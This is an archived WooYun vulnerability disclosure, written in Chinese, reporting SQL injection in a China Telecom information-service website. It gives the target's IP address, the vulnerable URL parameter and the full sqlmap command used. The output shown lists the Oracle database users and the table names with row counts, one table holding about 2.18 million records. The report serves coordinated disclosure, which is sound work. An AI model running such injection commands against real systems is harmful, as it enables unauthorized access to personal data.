乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-08-12: 细节已通知厂商并且等待厂商处理中 2013-08-16: 厂商已经确认,细节仅向厂商公开 2013-08-26: 细节向核心白帽子及相关领域专家公开 2013-09-05: 细节向普通白帽子公开 2013-09-15: 细节向实习白帽子公开 2013-09-26: 细节向公众公开
中国电信某信息服务系统SQL注入二百多万数据泄露
站点
http://116.228.55.5/114Ad/introduce.aspx
是一个生活服务类网站!用户数据,商家数据比较多。注入点
sqlmap.py -u "http://116.228.55.5/114Ad/articledetail.aspx?id=315" --current-db --current-user
是oracle数据库
system users
database management system users [24]:[*] ANONYMOUS[*] CTXSYS[*] DBSNMP[*] DIP[*] DMSYS[*] EXFSYS[*] HAOBAIAD[*] HAOBAIDB[*] MDDATA[*] MDSYS[*] MGMT_VIEW[*] OLAPSYS[*] ORACLE_OCM[*] ORDPLUGINS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SI_INFORMTN_SCHEMA[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB
45个表
Database: HAOBAIAD+-------------------------+---------+| Table | Entries |+-------------------------+---------+| CELLPHONESORT | 2179456 || AD_ISUSERFIRSTVISIT | 545611 || AD_ISUSERFIRSTVISIT_BAK | 477841 || ADMSENSE_REPORT | 80182 || ADSESSIONLOG | 67568 || AD_PROVINCE | 47861 || ADINTERFACESTATE | 26363 || ADMERCHANTS | 8995 || ADMTOP_EXTEND | 8377 || ADMTOP | 8376 || ADMRANK_REPORT | 6893 || ADMANAGEOPERATELOG | 3492 || GEOGRAPHY | 2800 || ADMSENSEKEYWORD | 1002 || ADMSENSEGROUP_EXTEND | 813 || ADMANAGE | 761 || ADMSENSEGROUP | 711 || ADMANAGEBALANCELOG | 576 || ADMANAGELOGINLOG | 554 || ADLOG | 441 || ADARTICLE | 321 || ADGROUPROLE | 207 || ADMERCHANTS_WEBSITE | 62 || ADPAGESYSTEM | 43 || ADORDER | 37 || CC_AD_CATEGORY | 17 || ADGROUP | 16 || ADGROUPPOWER | 16 || ADMANAGEUSERS | 15 || ADCHANNELINFO | 10 || ADCHANNELINFO_EXTEND | 8 || ADCHUSER | 7 || ADMANAGEMERCHANTLOG | 5 || ADCOMPANYINFO | 4 || AD_RETENTIONKEYWORD | 3 || ADCOMPANYUSER | 3 || ADMRANK | 3 || ADEMAIL | 2 || ADMSENSE_CONFIG | 2 |+-------------------------+---------+
| CELLPHONESORT | 2179456 |!!!
未深入,截图证明而已!
危害等级:高
漏洞Rank:14
确认时间:2013-08-16 23:22
暂无